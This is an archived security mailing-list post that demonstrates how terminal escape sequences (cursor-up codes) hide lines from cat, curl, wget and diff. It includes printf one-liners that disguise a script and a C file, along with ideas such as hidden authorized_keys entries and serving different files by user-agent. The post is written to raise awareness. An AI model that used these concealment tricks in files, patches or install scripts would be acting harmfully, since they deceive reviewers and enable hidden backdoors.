Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 17 Sep 2015 18:03:19 +0200
Subject: s/party/hack like it's 1999

Federico Bento <>

So recently i've encountered a post by Kurt Seifried of RedHat on  
oss-sec's mailing list entitled "Terminal escape sequences - the new  
XSS for admins?"

This is a little misleading title, since escape sequences have been  
introduced circa 70's, so it's actually not that new.

How it technically works:
A terminal escape sequence is a special sequence of characters that is  
printed (like any other text).
If the terminal understands the sequence, it won't display the  
character-sequence, but will perform some action.

While some people might already know what i'm going to present you,  
the majority I believe doesn't, so this is mostly to raise awareness.

$ printf '#!/bin/bash\necho doing something evil!\nexit\n\033[2Aecho  
doing something very nice!\n' >
$ chmod +x
$ cat
echo doing something very nice!
$ ./
doing something evil!

As you can see, our beloved 'cat' cheated on us. Why?
Because instead of displaying the character-sequence, the escape  
sequence \033[XA (being X the number of times) performed some action.
And this action moves the cursor up X times, overwriting what is above  
it X lines.
But this doesn't affect only 'cat', it affects everything that  
interprets escape sequences.

$ head
echo doing something very nice!

$ tail
echo doing something very nice!

$ more
echo doing something very nice!

It's not over yet!

$ curl
echo doing something very nice!

$ wget -qO -
echo doing something very nice!

But if we pipe it into a shell...

$ curl -s|sh
doing something evil!

$ wget -qO -|sh
doing something evil!

You might be thinking "If I opened that in my browser, I would detect  
it being malicious!"
Well, think again...
One can have all sorts of fun with user-agents, something that can  
easily come to mind is verifying if the user-agent is from curl or wget,
and make them download the malicious file, if not,
redirect them to a legitimate file that looks like the original  
output. Your browser would fool you then.

I wouldn't even be surprised if most of those install scripts that  
make use of these 'pipe into sh' bullcrap abused this.
I wouldn't even be surprised if most of you were already pwned by  
escape sequences in any situation at all.
Imagine the possibilities, from hidden ssh keys on your  
authorized_keys to options hidden on your configuration files...
It's no secret, most of us rely on 'cat' to view files. I guess this  
is one black kitty, giving you bad luck.

Here's another example with a .c file

$ printf '#include <stdio.h>\n\nint main()\n{\n\tprintf("doing  
something evil\\n");\n\t/*\033[2A\n\t/* This simple program doesnt do  
much... */\n\tprintf("doing something very nice\\n");\n\treturn  
0;\n}\n' > nice.c
$ cat nice.c
#include <stdio.h>

int main()
	/* This simple program doesnt do much... */
	printf("doing something very nice\n");
	return 0;
$ gcc nice.c
$ ./a.out
doing something evil
doing something very nice

'diff' also interprets escape sequences and so do the resulting patches

going back to the first example, imagine I have a that  
is backdoored, and a that does what it's output tells us.

$ cat #evil file
echo doing something very nice!

$ cat #actually echoes doing something very nice!
echo doing something very nice!

$ diff -Naur
---	2015-09-17 16:25:42.985349535 +0100
+++	2015-09-17 16:26:14.950158635 +0100
@@ -1,4 +1,2 @@
-echo doing something very nice!
+echo doing something very nice!

$ diff -Naur > file.patch
$ patch -R file.patch
$ chmod +x
$ ./
doing something evil!

'less' doesn't interpret escape sequences unless the -r switch is used,
so stop aliasing it to 'less -r' just because there's no colored output.

s/party/hack like it's 1999

This message was sent using IMP, the Internet Messaging Program.

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ